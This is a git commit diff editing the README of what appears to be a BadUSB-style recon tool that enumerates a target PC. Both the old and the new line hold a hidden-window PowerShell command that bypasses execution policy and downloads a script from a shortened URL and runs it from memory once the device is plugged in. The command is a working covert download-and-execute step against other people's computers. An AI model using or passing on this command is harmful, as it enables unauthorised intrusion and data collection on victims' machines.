Update README.md
This commit is contained in:
parent
0fa94af3e5
commit
5ab102da72
1 changed files with 1 additions and 1 deletions
|
@ -56,7 +56,7 @@ This program enumerates a target PC to collect as much recon data as possible fo
|
|||
* Plug in your device
|
||||
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
|
||||
```
|
||||
powershell -w h -NoP -NonI -Ep Bypass $db='';iwr rebrand.ly/9eegqdd | iex
|
||||
powershell -w h -NoP -Ep Bypass $db='';iwr rebrand.ly/9eegqdd | iex
|
||||
```
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
|
Loading…
Reference in a new issue